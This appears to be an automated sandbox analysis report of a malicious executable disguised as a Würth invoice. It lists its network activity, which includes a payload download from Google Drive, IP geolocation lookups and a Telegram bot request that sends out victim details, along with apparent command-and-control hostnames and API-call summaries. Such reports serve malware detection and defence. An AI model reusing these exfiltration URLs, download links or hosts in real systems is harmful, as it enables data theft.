Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2019/10/2024%20/%2007:08:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 18 Oct 2024 13:05:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Wuerth_factura_4052073226..exe, 00000000.00000002.2533263661.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Wuerth_factura_4052073226..exe, 00000000.00000000.2028021606.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000000.2528750158.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375C1000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375B2000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/=y
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277308268.0000000008870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM$LI
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZMlB
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/&
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/:
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM&export=download
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2725134762.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006EE6000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2692567127.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.000000003744D000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374BD000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.000000003744D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374BD000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000374E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.0000000038421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000003.2682855129.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000003.2682904166.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375F2000.00000004.00000800.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.00000000375E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_004052CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052CB

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040327D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004032B2 lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032B2

Detected potential crypto function

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_00404B08	0_2_00404B08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_00404B08	4_2_00404B08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DC147	4_2_000DC147
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DD278	4_2_000DD278
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D5362	4_2_000D5362
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DC472	4_2_000DC472
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DC738	4_2_000DC738
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DE988	4_2_000DE988
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DCA08	4_2_000DCA08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DCCD8	4_2_000DCCD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D9DE0	4_2_000D9DE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DCFAA	4_2_000DCFAA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D6FC8	4_2_000D6FC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DE97A	4_2_000DE97A
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000DF974	4_2_000DF974
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D29E0	4_2_000D29E0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_000D3E09	4_2_000D3E09
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB2968	4_2_39DB2968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBFC68	4_2_39DBFC68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB5028	4_2_39DB5028
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB17A0	4_2_39DB17A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB9328	4_2_39DB9328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB1E80	4_2_39DB1E80
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBDDF1	4_2_39DBDDF1
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD999	4_2_39DBD999
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD9A8	4_2_39DBD9A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD550	4_2_39DBD550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB9548	4_2_39DB9548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD540	4_2_39DBD540
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD0F8	4_2_39DBD0F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBD0E9	4_2_39DBD0E9
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBCC8F	4_2_39DBCC8F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBCCA0	4_2_39DBCCA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0040	4_2_39DB0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB9C18	4_2_39DB9C18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB5018	4_2_39DB5018
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0012	4_2_39DB0012
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF810	4_2_39DBF810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF805	4_2_39DBF805
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB8B91	4_2_39DB8B91
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB178F	4_2_39DB178F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF3B8	4_2_39DBF3B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBF3A8	4_2_39DBF3A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB8BA0	4_2_39DB8BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEF51	4_2_39DBEF51
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEF60	4_2_39DBEF60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEB08	4_2_39DBEB08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0B30	4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB0B20	4_2_39DB0B20
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBEAF8	4_2_39DBEAF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE6B0	4_2_39DBE6B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE6AF	4_2_39DBE6AF
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE6A0	4_2_39DBE6A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE258	4_2_39DBE258
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE257	4_2_39DBE257
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBE24D	4_2_39DBE24D
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DB1E70	4_2_39DB1E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_39DBDE00	4_2_39DBDE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4ED0	4_2_3A5F4ED0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F7B78	4_2_3A5F7B78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F8FB0	4_2_3A5F8FB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F81D0	4_2_3A5F81D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FEE57	4_2_3A5FEE57
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1A50	4_2_3A5F1A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1A4F	4_2_3A5F1A4F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F1A41	4_2_3A5F1A41
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FCE78	4_2_3A5FCE78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4A78	4_2_3A5F4A78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6E72	4_2_3A5F6E72
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6E70	4_2_3A5F6E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FEE68	4_2_3A5FEE68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5FCE67	4_2_3A5FCE67
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6A18	4_2_3A5F6A18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F6A07	4_2_3A5F6A07
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4622	4_2_3A5F4622
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F4620	4_2_3A5F4620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F72CA	4_2_3A5F72CA
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F72C8	4_2_3A5F72C8
